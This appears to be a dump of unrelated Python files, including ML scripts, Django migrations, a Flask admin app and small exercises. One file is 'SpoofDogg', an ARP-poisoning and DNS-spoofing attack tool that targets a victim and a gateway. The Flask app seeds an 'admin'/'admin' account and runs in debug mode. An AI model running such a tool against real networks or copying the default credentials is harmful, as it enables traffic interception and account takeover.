clf1 = LogisticRegression(C=1, max_iter=1000)
clf2 = DecisionTreeClassifier(max_depth=5)
X = data.drop(['quality', 'target'], axis=1)
y = data['target']
trnX, valX, trnY, valY = train_test_split(X,y,stratify=y, test_size=0.2, random_state=70)
clf1.fit(trnX, trnY)
clf2.fit(trnX, trnY)
y_pred1 = clf1.predict(valX)
y_pred2 = clf2.predict(valX)
print('Accuracy: Logistic = %.4f Tree=%.1f'%(accuracy_score(valY, y_pred1), accuracy_score(valY, y_pred2)))
# interests in good wine
metrics=[recall_score, precision_score, f1_score]
for nm, m in zip(('Recall', 'Precision', 'F1'), metrics):
print('%s: Logistic = %.4f Tree=%.1f'%(nm, m(valY, y_pred1, pos_label=1), m(valY, y_pred2, pos_label=1)))
y_prob = clf1.predict_proba(valX)
from sklearn.metrics import roc_curve, roc_auc_score
fpr, tpr, thresholds = roc_curve(valY, y_prob[:, 1], pos_label=1)
import matplotlib.pyplot as plt
xx = np.linspace(0,1,10)
plt.plot(fpr, tpr)
plt.plot(xx,xx,'k--')
roc_auc_score(valY, y_prob[:,1])
|
import datetime
class hotel_manage:
def __init__(self, rt='', s=0, p=0, r=0, t=0, a=1000, name='', address='', cindate='', coutdate='', room_no=1):
print("\n\n********WELCOME TO HOTEL TRANSYLVANIA********")
self.rt = rt
self.s = s
self.p = p
self.r = r
self.t = t
self.a = a
self.name = name
self.address = address
self.cindate = cindate
self.coutdate = coutdate
self.room_no = room_no
def input_data(self):
self.name = input('\nEnter your full name: ')
self.address = input('\nEnter your address: ')
self.cindate = input('\nEnter your check in date (YYYY-MM-DD): ')
self.coutdate = input('\nEnter your check out date (YYYY-MM-DD): ')
a = datetime.date.fromisoformat(self.cindate)
b = datetime.date.fromisoformat(self.coutdate)
duration = str(b - a)
global dur
dur = duration.split(',')[0]
print('Your room no: ', self.room_no, '\n')
def room_rent(self):
print('We have the following rooms for you:-')
print('1. Class A----->10000')
print('2. Class B----->8000')
print('3. Class C----->6000')
print('4. Class D----->4000')
x = int(input('Please enter the number of your choice----->'))
n = int(input('For how many nights did you stayL----->'))
if x == 1:
print('You have chosen a Class A room')
self.s = 10000 * n
elif x == 2:
print('You have chosen a Class B room')
self.s = 8000 * n
elif x == 3:
print('You have chosen a Class C room')
self.s = 6000 * n
elif x == 4:
print('You have chosen a Class D room')
self.s = 4000 * n
else:
print('PLEASE CHOOSE A ROOM')
print('Your chosen room rent is', self.s, '\n')
def food_purchased(self):
print('********RESTAURANT MENU********')
print('1.Dessert----->100', '2.Drinks----->50', '3.Breakfast----->90', '4.Lunch----->120', '5.Dinner----->180', '6.EXIT')
while True:
c = int(input('Enter the number of your choice: '))
if c == 1:
d = int(input('Enter the quantity: '))
self.r += 100 * d
elif c == 2:
d = int(input('Enter the quantity: '))
self.r += 50 * d
elif c == 3:
d = int(input('Enter the quantity: '))
self.r += 90 * d
elif c == 4:
d = int(input('Enter the quantity: '))
self.r += 120 * d
elif c == 5:
d = int(input('Enter the quantity: '))
self.r += 180 * d
elif c == 6:
break
else:
print('You have entered an invalid key')
print('Total food cost= Gh', self.r, '\n')
def hotel_bill(self):
print('********HOTEL BILL********')
print('Customer details:')
print('Customer name: ', self.name)
print('Customer address: ', self.address)
print('Check in date: ', self.cindate)
print('Check out date: ', self.coutdate)
print('Room no.', self.room_no)
print(f'You spent {dur} at Hotel Transylvania')
print('Your room rent is:', self.s)
print('Your food bill is:', self.r)
self.rt = self.s + self.t + self.p + self.r
print('Your sub total purchased is:', self.rt)
print('Additional Service Charges is:', self.a)
print('Your Grandtotal purchased is:', self.rt + self.a, '\n')
self.room_no += 1
def main():
a = hotel_manage
while True:
print('1. Enter Customer Data')
print('2. Calculate Room Rent')
print('3. Calculate Food Purchased')
print('4. Show Total Cost')
print('5. EXIT')
b = int(input('\nEnter the number of your choice: '))
if b == 1:
a.input_data()
elif b == 2:
a.room_rent()
elif b == 3:
a.food_purchased()
elif b == 4:
a.hotel_bill()
elif b == 5:
quit()
if __name__ == '__main__':
main()
emp = hotel_manage()
emp.input_data()
emp.room_rent()
emp.food_purchased()
emp.hotel_bill()
emp.main
|
#自动生成新的扫描对象
class Autoupdate:
pass
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from Helper import *
from datetime import datetime
import math
import time
import numpy as np
import tensorflow as tf
import cifar10
# Set global variables
from settings import *
class Predicter():
def __init__(self, name):
self.width = 32
self.height = 32
self.eval_dir = global_path_to_cifar10eval_single_directory
self.eval_data = 'test'
self.checkpoint_dir = global_path_to_cifar10train100k
self.eval_interval_secs = 60 * 5
self.num_examples = 1
self.run_once = True
# self.batch_size = cifar10.batch_size
self.batch_size = 1
self.save_to_file = name
def eval_once(self, saver, summary_writer, top_k_op, summary_op, logits):
"""Run Eval once.
Args:
saver: Saver.
summary_writer: Summary writer.
top_k_op: Top K op.
summary_op: Summary op.
"""
with tf.Session() as sess:
ckpt = tf.train.get_checkpoint_state(self.checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
# Restores from checkpoint
saver.restore(sess, ckpt.model_checkpoint_path)
# Assuming model_checkpoint_path looks something like:
# /my-favorite-path/cifar10_train/model.ckpt-0,
# extract global_step from it.
global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]
else:
print('No checkpoint file found')
return
# Start the queue runners.
coord = tf.train.Coordinator()
try:
threads = []
for qr in tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS):
threads.extend(qr.create_threads(sess, coord=coord, daemon=True,
start=True))
num_iter = int(math.ceil(self.num_examples / self.batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * self.batch_size
step = 0
while step < num_iter and not coord.should_stop():
# predictions = sess.run([top_k_op])
# true_count += np.sum(predictions)
# step += 1
predictions = sess.run([top_k_op])
# print(sess.run([logits[0]]))
# print(sess.run([tf.shape(logits)]))
# print(sess.run(tf.argmax(logits[0], 0)))
classification = sess.run(tf.argmax(logits[0], 0))
cifar10classes = ["0", "1"]
f = open(global_path_to_cifar10eval+'workfile', 'w')
with open(self.save_to_file, "a") as myfile:
myfile.write(cifar10classes[classification])
myfile.write("\n")
print(cifar10classes[classification])
true_count += np.sum(predictions)
step += 1
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
summary = tf.Summary()
summary.ParseFromString(sess.run(summary_op))
summary.value.add(tag='Precision @ 1', simple_value=precision)
summary_writer.add_summary(summary, global_step)
except Exception as e: # pylint: disable=broad-except
coord.request_stop(e)
coord.request_stop()
coord.join(threads, stop_grace_period_secs=10)
def evaluate(self):
"""Eval CIFAR-10 for a number of steps."""
with tf.Graph().as_default() as g:
# Get images and labels for CIFAR-10.
self.eval_data == 'test'
images, labels = cifar10.inputs(eval_data=self.eval_data)
# Build a Graph that computes the logits predictions from the
# inference model.
logits = cifar10.inference(images)
# Calculate predictions.
top_k_op = tf.nn.in_top_k(logits, labels, 1)
# Restore the moving average version of the learned variables for eval.
variable_averages = tf.train.ExponentialMovingAverage(
cifar10.MOVING_AVERAGE_DECAY)
variables_to_restore = variable_averages.variables_to_restore()
saver = tf.train.Saver(variables_to_restore)
# Build the summary operation based on the TF collection of Summaries.
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(self.eval_dir, g)
while True:
self.eval_once(saver, summary_writer, top_k_op, summary_op, logits)
if self.run_once:
break
# time.sleep(self.eval_interval_secs)
|
from django.contrib import admin
# Register your models here.
from .models import Banner
class BannerAdmin(admin.ModelAdmin):
list_display = ["image", "name", "orders", "link"]
admin.site.register(Banner, BannerAdmin)
|
# Generated by Django 3.2 on 2021-06-11 12:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Portfolio',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ProjectName', models.CharField(max_length=50)),
('ProjectTitle', models.CharField(max_length=150)),
('ClinentName', models.CharField(max_length=50)),
('LanguageUse', models.CharField(max_length=250)),
('ProjectUrl', models.CharField(max_length=250)),
('ProjectImage', models.ImageField(upload_to='portfolio/')),
('UploadOption', models.CharField(choices=[('0', 'Image'), ('1', 'Slider Image'), ('2', 'Online Video'), ('3', 'Local Video')], default=0, max_length=1)),
],
),
migrations.CreateModel(
name='MultipleImageUpload',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('images', models.ImageField(upload_to='portfolio/')),
('portfolio', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Portfolio.portfolio')),
],
),
]
|
# -*- coding: utf-8 -*-
import os
from flask import Flask, url_for, redirect, render_template, request, abort
from flask_admin import Admin, AdminIndexView
from flask_admin.base import MenuLink
from flask_admin.contrib.sqla import ModelView
from flask_admin import helpers as admin_helpers
from flask_sqlalchemy import SQLAlchemy
from flask_security import Security, SQLAlchemyUserDatastore, \
UserMixin, RoleMixin, login_required, current_user
from flask_security.utils import encrypt_password
import flask_restless
from flask_cors import CORS
from datetime import datetime
from settings import *
app = Flask(__name__)
#Config
CORS(app)
"""
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///" + SETTINGS['DATABASE']
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = SETTINGS['SECRET_KEY']
if SETTINGS['DEBUG']:
app.config['SQLALCHEMY_ECHO'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True
"""
app.config.from_pyfile('settings.py')
db = SQLAlchemy(app)
tagevento_table = db.Table('tag_evento',
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id')),
db.Column('evento_id', db.Integer, db.ForeignKey('evento.id'))
)
rolesusers_table = db.Table(
'roles_users',
db.Column('responsavel_id', db.Integer(), db.ForeignKey('responsavel.id')),
db.Column('role_id', db.Integer(), db.ForeignKey('role.id'))
)
class Role(db.Model, RoleMixin):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(255), unique=True)
description = db.Column(db.String(255))
def __repr__(self):
return self.name
class Orgao(db.Model):
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.String(255))
def __repr__(self):
return self.nome
class Tipo(db.Model):
id = db.Column(db.Integer, primary_key=True)
tipo = db.Column(db.String(255))
def __repr__(self):
return self.tipo
class Tag(db.Model):
id = db.Column(db.Integer, primary_key=True)
tag = db.Column(db.String(255))
def __repr__(self):
return self.tag
class Responsavel(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.String(255))
orgao_id = db.Column(db.Integer, db.ForeignKey('orgao.id'))
orgao = db.relationship('Orgao')
email = db.Column(db.String(255), unique=True)
tel = db.Column(db.String(255))
data_registro = db.Column(db.DateTime)
password = db.Column(db.String(255))
active = db.Column(db.Boolean())
confirmed_at = db.Column(db.DateTime())
roles = db.relationship('Role', secondary=rolesusers_table,
backref=db.backref('Responsavel', lazy='dynamic'))
def __repr__(self):
return self.nome
def is_authenticated(self):
return self.active
class Evento(db.Model):
id = db.Column(db.Integer, primary_key=True)
titulo = db.Column(db.String(255), unique=False)
local = db.Column(db.String(255), unique=False)
orgao_id = db.Column(db.Integer, db.ForeignKey('orgao.id'))
orgao = db.relationship('Orgao')
responsavel_id = db.Column(db.Integer, db.ForeignKey('responsavel.id'))
responsavel = db.relationship('Responsavel')
tipo_id = db.Column(db.Integer, db.ForeignKey('tipo.id'))
tipo = db.relationship('Tipo')
local = db.Column(db.String(255))
endereco = db.Column(db.String(255))
data_inicio = db.Column(db.DateTime)
data_fim = db.Column(db.DateTime)
horario = db.Column(db.String(255))
descricao = db.Column(db.Text)
link = db.Column(db.String(255))
cartaz = db.Column(db.String(255))
tags = db.relationship('Tag', secondary=tagevento_table)
def __repr__(self):
return '<Titulo %r>' % self.titulo
# Setup Flask-Security
user_datastore = SQLAlchemyUserDatastore(db, Responsavel, Role)
security = Security(app, user_datastore)
# Create customized model view class
class LoginRequired():
#Override builtin _handle_view in order to redirect users when a view is not accessible.
def _handle_view(self, name, **kwargs):
if not self.is_accessible():
if current_user.is_authenticated:
abort(403)
else:
return redirect(url_for('security.login', next=request.url))
class IndexView(LoginRequired, AdminIndexView):
def is_accessible(self):
return current_user.is_authenticated
class SuperuserView(LoginRequired, ModelView):
def is_accessible(self):
return current_user.has_role('superuser')
class UserView(LoginRequired, ModelView):
def is_accessible(self):
return current_user.has_role('user')
#view custom de evento
class EventoView(UserView):
column_labels = dict(tags="Categorias")
def on_form_prefill(self, form, id):
print(form)
@app.route("/")
def index():
return redirect(url_for('admin.index'))
admin = Admin(app, name='Agenda Publica', template_mode='bootstrap3', index_view=IndexView())
# Add administrative views here
admin.add_view(EventoView(Evento, db.session))
#admin.add_view(SuperuserView(Evento, db.session))
admin.add_view(SuperuserView(Responsavel, db.session))
admin.add_view(SuperuserView(Orgao, db.session))
admin.add_view(SuperuserView(Tipo, db.session))
admin.add_view(SuperuserView(Tag, db.session))
admin.add_link(MenuLink(name='Logout', endpoint='security.logout'))
# Create the Flask-Restless API manager.
manager = flask_restless.APIManager(app, flask_sqlalchemy_db=db)
# Create API endpoints, which will be available at /api/<tablename> by
# default. Allowed HTTP methods can be specified as well.
manager.create_api(Evento, methods=['GET'])
@security.context_processor
def security_context_processor():
return dict(
admin_base_template=admin.base_template,
admin_view=admin.index_view,
h=admin_helpers,
)
def build_sample_db():
"""
Populate a small db with some example entries.
"""
db.drop_all()
db.create_all()
with app.app_context():
user_role = Role(name='user')
super_user_role = Role(name='superuser')
db.session.add(user_role)
db.session.add(super_user_role)
db.session.commit()
test_user = user_datastore.create_user(
nome='Admin',
email='admin',
password=encrypt_password('admin'),
roles=[user_role, super_user_role]
)
db.session.commit()
return
if __name__ == "__main__":
# Build a sample db on the fly, if one does not exist yet.
"""
app_dir = os.path.realpath(os.path.dirname(__file__))
database_path = os.path.join(app_dir, SETTINGS['DATABASE'])
if not os.path.exists(database_path):
build_sample_db()
"""
app.run(host='0.0.0.0', debug=True)
|
# Generated by Django 2.2.11 on 2020-03-13 19:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('orgchart', '0006_auto_20200314_0011'),
]
operations = [
migrations.RemoveField(
model_name='detail',
name='employments_url',
),
migrations.AddField(
model_name='detail',
name='Hire_date',
field=models.CharField(max_length=40, null=True),
),
migrations.AddField(
model_name='detail',
name='emp_type',
field=models.CharField(max_length=40, null=True),
),
]
|
#!/usr/bin/env python3
import argparse
import time
import os
import sys
import multiprocessing
from arp_spoofer import spoof, restore, enable_ip_routing
from dns_spoofer import dns_main
sys.exit("Use the -h parameter to learn about using the program.") if len(sys.argv[1:]) == 0 else True
description = "SpoofDogg is a tool that initially starts an ARP spoofing attack. " \
"It can also be started to initiate an automatic DNS spoofing attack afterwards as well"
parser = argparse.ArgumentParser(description=description)
parser.add_argument("target", help="Victim IP address to poison")
parser.add_argument("host", help="The host to intercept packets from. Usually this is the gateway")
parser.add_argument("-dns", "--dns_spoof", help="Start DNS spoofing after ARP poisoning. "
"Only works on Linux machines due to iptables usage.", action="store_true")
args = parser.parse_args()
def get_arguments():
"""
Initializes target_ip and host_ip
:return: target_ip AND host_ip
"""
target_ip = args.target
host_ip = args.host
return target_ip, host_ip
def dns_check():
if ("nt" in os.name) and args.dns_spoof:
sys.exit("DNS spoofing is only available for machines running a Linux distro.")
def spoofy():
# Get target and host
target, host = get_arguments()
while True:
# Tell the victim that we are the gateway
spoof(target, host)
# Tell the gateway that we are the target (victim)
spoof(host, target)
# Sleep for a second to prevent a dos
time.sleep(1)
def main():
target, host = get_arguments()
# Check DNS compatibility
dns_check()
# Enable ip forwarding for the system
enable_ip_routing()
# Create processes
arper = multiprocessing.Process(target=spoofy)
dns_spoofer = multiprocessing.Process(target=dns_main())
# Start processes
try:
arper.start()
if args.dns_spoof:
dns_spoofer.start()
except KeyboardInterrupt:
# Stop processes
arper.close()
if dns_spoofer.is_alive():
dns_spoofer.close()
# Restore the network
restore(target, host)
restore(host, target)
if args.dns_spoof:
os.system("iptables --flush")
if __name__ == '__main__':
main()
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from glob import glob
import os
def generate_clist(NUM_COLORS):
import pylab
cm = pylab.get_cmap('cool')
color = [cm(1-1.*i/NUM_COLORS) for i in range(NUM_COLORS)]
return color
def weighted_avg_and_std(values, weights):
"""
Return the weighted average and standard deviation.
values, weights -- Numpy ndarrays with the same shape.
"""
# mask NaNs and calculate average and std ignoring them
masked_data = np.ma.masked_array(values, np.isnan(values))
average = np.ma.average(masked_data, weights=weights)
# Fast and numerically precise:
variance = np.ma.average((masked_data-average)**2, weights=weights)
return average, np.sqrt(variance)
def ims_plot(fpath, mass, tolerance, norm_cv, outname, title_label=None,
charge=None, figsize=None, ylim=None, xlim=None, legend=True):
"""
Plot IMS unfolding plot by normalising to drift time at certain collision
voltage
Parameters
----------
fpath : str or list
Either glob pattern or list of paths to csv output files form PULSAR.
mass : int
Mass to extract from the csv file (in case there are mutliple forms).
tolerance : int
Tolerance range for the mass. Allows pooling multiple species.
norm_cv : int
Collision voltage to normalise drift times to. Must be present in all datasets.
outname : str
Path to save the figure (without extension).
title_label : str, optional
Title to plot above the plot. The default is the filepath.
charge : int, optional
Only plot drift times from a single charge state. The default is all charge states.
Raises
------
Exception
If the glob pattern or list did not match existing files.
Returns
-------
None.
"""
if figsize != None:
fig, ax = plt.subplots(1,1, figsize=figsize)
else:
fig, ax = plt.subplots(1,1)
file_dfs = []
if not isinstance(fpath, list):
try:
for file in glob(fpath):
temp = pd.read_csv(file)
temp['file'] = file
file_dfs.append(temp)
except:
raise Exception("Could not open glob pattern {}".format(fpath))
else:
for file in fpath:
temp = pd.read_csv(file)
temp['file'] = file
file_dfs.append(temp)
data = pd.concat(file_dfs)
g = data.groupby('file')
color = generate_clist(g.ngroups)
subsets = []
averages = []
for ix, filename in enumerate(g.groups.keys()):
subset = g.get_group(filename)
# filter by mass (as provided in input)
subset = subset[(subset['mass'] > mass-tolerance) & (subset['mass'] < mass+tolerance)]
# filter by charge if requested
if charge != None:
print('Filtering by charge {}'.format(charge))
subset = subset[subset['z'] == charge]
# warn if the filters remove everything
if len(subset) == 0:
raise Exception("Subset after mass filtering is emtpy. Did you use the right mass?")
# ignore data points with less than 10% basepeak intensity
subset['basepeak_intensity'] = subset.groupby('collision_voltage')['drift_intensity'].transform('max')
subset = subset[subset['drift_intensity'] > 0.1 * subset['basepeak_intensity']]
# sort ascending by collision voltage
subset.sort_values(by='collision_voltage', inplace=True)
# normalise by the drift_time of the lowest charge state within charge
# state groups!
chargestates = subset['z'].unique()
for z in chargestates:
c = subset[subset['z'] == z]
# use the mean to circumvent the problem, that selection returns a
# list while we need a single value
# also allows selecting CV ranges for normalisation
subset.loc[subset['z'] == z, 'rel_drift_center'] =\
100*c['drift_center'] / c[c['collision_voltage'] == norm_cv]['drift_center'].mean()
# init an empty dataframe with only the index
average = pd.DataFrame(index=subset['collision_voltage'].unique())
# Normalisation procudes NaN for charge states that did not occur at
# the desired collision voltage range -> need to ignore in average and
# std calculations
average[['Mean', 'Std']] = subset.groupby('collision_voltage').apply(lambda x: weighted_avg_and_std(x['rel_drift_center'], weights=x['drift_intensity'])).tolist()
# label = str(subset['file_name'].unique()[0])[-30:]
label = filename[-30:]
ax.plot(average['Mean'],
color=color[ix],
label=label)
ax.fill_between(average.index, average['Mean']-1*average['Std'],
average['Mean'] + 1*average['Std'],facecolor=color[ix],
alpha=0.1)
ax.plot(average.index, average['Mean']-1*average['Std'],
color=color[ix],
linestyle='dotted')
ax.plot(average.index, average['Mean']+1*average['Std'],
color=color[ix],
linestyle='dotted')
subsets.append(subset)
averages.append(average)
if legend:
plt.legend()
if not title_label:
title_label = ' '.join(fpath.split(os.path.sep)[-2:])
ax.set_title(title_label)
ax.set_xlabel('Collision voltage [V]')
ax.set_ylabel('Relative Drift Time [%]')
if ylim:
ax.set_ylim(ylim)
if xlim:
ax.set_xlim(xlim)
plt.savefig(outname + ".pdf")
plt.savefig(outname + ".png")
plt.show()
return subsets, averages |
import webapp2
from webapp2_extras import jinja2
from google.appengine.ext import ndb
from model.libroCientifico import libroCientifico
from google.appengine.api import users
class EditarLibroCientificoHandler(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
try:
id_libroCientifico = self.request.GET["id_libroCientifico"]
except:
id_libroCientifico = "ERROR"
libroCientifico = ndb.Key(urlsafe=id_libroCientifico).get()
sust = {
"libroCientifico": libroCientifico
}
jinja = jinja2.get_jinja2(app=self.app)
self.response.write(
jinja.render_template("librosCientificos/editarLibroCientifico.html", **sust)
)
else:
self.redirect("/")
return
def post(self):
# Recupera del formulario
titulo = self.request.get("edTitulo", "ERROR")
autor = self.request.get("edAutor", "ERROR")
campo = self.request.get("edCampo", "ERROR")
id_libroCientifico = self.request.get("edIdLibroCientifico", "ERROR")
# Guarda los datos
libroCientifico = ndb.Key(urlsafe=id_libroCientifico).get()
libroCientifico.titulo=titulo
libroCientifico.autor = autor
libroCientifico.campo = campo
libroCientifico.put()
url = "/verLibroCientifico?id_libroCientifico=" + libroCientifico.key.urlsafe()
mensaje = "El libro '" + titulo + "' ha sido editado con exito"
sust = {
"mensaje": mensaje,
"url": url
}
jinja = jinja2.get_jinja2(app=self.app)
self.response.write(
jinja.render_template("mensajeConfirmacion.html", **sust)
)
app = webapp2.WSGIApplication([
('/editarLibroCientifico', EditarLibroCientificoHandler)
], debug=True) |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# plt.show()
with open('losses') as losses:
a = losses.readlines()
# a = [i[-7:-1] for i in a[::2]]
a = [float(i[-7:-1]) for i in a if '/' not in i and 'model' not in i]
print(a)
pd.DataFrame({
'epoch': np.arange(len(a)),
'loss': a
}).plot.line(x='epoch', y='loss', color='r', figsize=(20, 10)).set(title='bzip2d') |
#! python3
# multiplyTable.py takes a number(N) from the command line and returns an
# excel spreadsheet with an NxN multiplication table. Every time this program
# is called it will write to the same excel file. If the program is called with
# an N that has been already used, the program will open the file, make the relevant
# sheet the active sheet, save the file and close it.
# If that N has never been used previously then the program will create the NxN table in
# a new sheet, save and close the file. At the end of the program it will launch Excel
# and open the file.
import openpyxl, sys, os
from openpyxl.styles import Font
sys.argv # ['.\multiplyTable.py', N]
N = sys.argv[1] #string value of N
Nnum = int(sys.argv[1]) #integer value of N
# Open multiplyTable excel workbook.
workbook = openpyxl.load_workbook(r'c:\users\coding\python\scripts\automate\multiplyTable.xlsx')
#Create Bold Font to be appplied.
BoldFont = Font(bold = True)
#Create a list of values from 1 to N
values = list(range(1, Nnum+1)) # values = [1, 2, 3, ..., N]
# Get all sheetnames in workbook.
sheetnames = workbook.sheetnames
# If N is already a sheet then make that sheet
# the active sheet, save and close workbook.
if N in sheetnames:
sheetindex = workbook.sheetnames.index(N)
workbook.active = sheetindex
# If N is not already a sheet then create that sheet, title it "N"
# and populate the table.
if N not in sheetnames:
sheet = workbook.create_sheet(N, 0)
workbook.active = 0 #Make this sheet the active sheet, since we placed it at index 0 when we made it.
#ToDo: Enter values for cells in row 1 and Column A as appropriate. Bold these cells.
#sheet['A'].font = BoldFont
#sheet['1'].font = BoldFont
#ToDo: Loop over all the cells multiplying by the appropriate values
for item in values:
sheet.cell(row=1, column=item+1, value='N = ' + str(item))
sheet.cell(row=1, column=item+1).font = BoldFont
sheet.cell(row=item+1, column=1, value='N = ' + str(item))
sheet.cell(row=item+1, column=1).font = BoldFont
# sheet.cell(row = 2, column = item+1, value=item) #The first row multiplies by 1
# sheet.cell(row = item+1, column=2, value=item) #The first column multiples by 1
# The above rows were originally in the for loop but then I realized that they weren't needed.
for j in values:
sheet.cell(row=item+1, column=j+1, value = item*j) # This writes the table
#Save and close workbook.
workbook.save(r'c:\users\coding\python\scripts\automate\multiplyTable.xlsx')
workbook.close()
# ToDo : Launch excel and open file with relevant sheet active.
os.chdir(r'c:\users\coding\python\scripts\automate')
os.system('start excel.exe multiplyTable.xlsx')
|
#!/usr/bin/env python3
import sys
import subprocess
if len(sys.argv) > 1:
name = sys.argv[1]
else:
name = raw_input('Enter User Name:')
if name == 'root':
print("Can't do anything with the 'root' user account......Breaking the program")
sys.exit()
subprocess.call(["adduser", name])
subprocess.call(["usermod", "-aG","sudo", name])
subprocess.call(["passwd", name])
|
n = int(input("Digite um número: "))
lista = list()
a = list()
while n != 0:
lista.append(n)
n = int(input("Digite um número: "))
for i in range(len(lista)-1, -1, (-1)):
print(lista[i])
|
"""
Write a python program to find and display the product of three positive integer values based on the rule mentioned below:
It should display the product of the three values except when one of the integer value is 7.
In that case, 7 should not be included in the product and the values to its left also should not be included.
If there is only one value to be considered, display that value itself. If no values can be included in the product, display -1.
+--------------+-----------------+
| Sample Input | Expected Output |
+--------------+-----------------+
| 1, 5, 3 | 15 |
+--------------+-----------------+
| 3, 7, 8 | 8 |
+--------------+-----------------+
| 7, 4, 3 | 12 |
+--------------+-----------------+
| 1, 5, 7 | -1 |
+--------------+-----------------+
"""
#PF-Assgn-15
def find_product(num1,num2,num3):
product=0
#write your logic here
if (num1 != 7 and num2 != 7 and num3 != 7):
product = num1 * num2 * num3
elif (num1 == 7):
product = num2 * num3
elif(num2 == 7):
product = num3
elif(num3 == 7):
product = -1
return product
#Provide different values for num1, num2, num3 and test your program
product=find_product(7,6,2)
print(product)
|
# Generated by Django 3.0.6 on 2020-05-22 13:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('LaF', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='find',
name='PIN_code',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='find',
name='aadhaar_no',
field=models.IntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='find',
name='age',
field=models.IntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='find',
name='pan_no',
field=models.EmailField(blank=True, default=0, max_length=254, null=True),
),
migrations.AlterField(
model_name='lost',
name='PIN_code',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='lost',
name='aadhaar_no',
field=models.IntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='lost',
name='age',
field=models.IntegerField(blank=True, default=0, null=True),
),
migrations.AlterField(
model_name='lost',
name='pan_no',
field=models.EmailField(blank=True, default=0, max_length=254, null=True),
),
]
|
from jinja2 import Template
from moto.ec2.models import ec2_backend
from moto.ec2.utils import resource_ids_from_querystring
class ElasticIPAddresses(object):
def allocate_address(self):
raise NotImplementedError('ElasticIPAddresses.allocate_address is not yet implemented')
def associate_address(self):
raise NotImplementedError('ElasticIPAddresses.associate_address is not yet implemented')
def describe_addresses(self):
raise NotImplementedError('ElasticIPAddresses.describe_addresses is not yet implemented')
def disassociate_address(self):
raise NotImplementedError('ElasticIPAddresses.disassociate_address is not yet implemented')
def release_address(self):
raise NotImplementedError('ElasticIPAddresses.release_address is not yet implemented')
|
import pandas as pd
class Cargo:
def __init__(self, size, vin, eta, code, plant, dda) -> None:
self.size = size
self.vin = vin
self.eta = eta
self.code = code
self.plant = plant
self.dda = dda |
# Generated by Django 2.1.5 on 2019-07-06 00:43
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('chat', '0012_chat_receiver'),
]
operations = [
migrations.RemoveField(
model_name='chat',
name='receiver',
),
]
|
class Solution:
def compareVersion(self, version1: str, version2: str) -> int:
i = 0
v1 = version1.split(".")
v2 = version2.split(".")
l1 = len(v1)
l2 = len(v2)
print(v1,v2)
while i<l1 or i<l2:
if i>=l1 and i<l2:
if int(v2[i]) == 0:
i += 1
continue
else:
return -1
elif i>=l2 and i<l1:
if int(v1[i]) == 0:
i += 1
continue
else:
return 1
else:
if int(v1[i]) > int(v2[i]):
return 1
elif int(v1[i]) < int(v2[i]):
return -1
i += 1
return 0
class Solution:
def compareVersion(self, version1: str, version2: str) -> int:
version1=list(map(int,version1.split('.'))) #Splitting version at '.' and converting each part to int
version2=list(map(int,version2.split('.')))
n=len(version1)
m=len(version2)
if(n>m): #To make length of both version equal
for i in range(n-m):
version2.append(0)
else:
for i in range(m-n):
version1.append(0)
for i in range(len(version1)): #Final Comparision
if(version1[i]>version2[i]):
return 1
if(version1[i]<version2[i]):
return -1
return 0 |
# HSV Calibration Code
import cv2
import numpy as np
def nothing(x):
pass
camera = cv2.VideoCapture(0)
cv2.namedWindow('Filtered Video')
h_lower,s_lower,v_lower = 0,0,0
h_upper,s_upper,v_upper = 255,255,255
# creating track bar
cv2.createTrackbar('h_lower', 'Filtered Video',h_lower,179,nothing)
cv2.createTrackbar('s_lower', 'Filtered Video',s_lower,255,nothing)
cv2.createTrackbar('v_lower', 'Filtered Video',v_lower,255,nothing)
cv2.createTrackbar('h_upper', 'Filtered Video',h_upper,179,nothing)
cv2.createTrackbar('s_upper', 'Filtered Video',s_upper,255,nothing)
cv2.createTrackbar('v_upper', 'Filtered Video',v_upper,255,nothing)
while True:
(grabbed, frame) = camera.read()
if not grabbed:
break
hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)
h_lower = cv2.getTrackbarPos('h_lower','Filtered Video')
s_lower = cv2.getTrackbarPos('s_lower','Filtered Video')
v_lower = cv2.getTrackbarPos('v_lower','Filtered Video')
h_upper = cv2.getTrackbarPos('h_upper','Filtered Video')
s_upper = cv2.getTrackbarPos('s_upper','Filtered Video')
v_upper = cv2.getTrackbarPos('v_upper','Filtered Video')
lower_set = np.array([h_lower, s_lower, v_lower])
upper_set = np.array([h_upper, s_upper, v_upper])
mask = cv2.inRange(hsv,lower_set, upper_set)
res = cv2.bitwise_and(frame,frame,mask=mask)
cv2.imshow('fff',res)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cap.release()
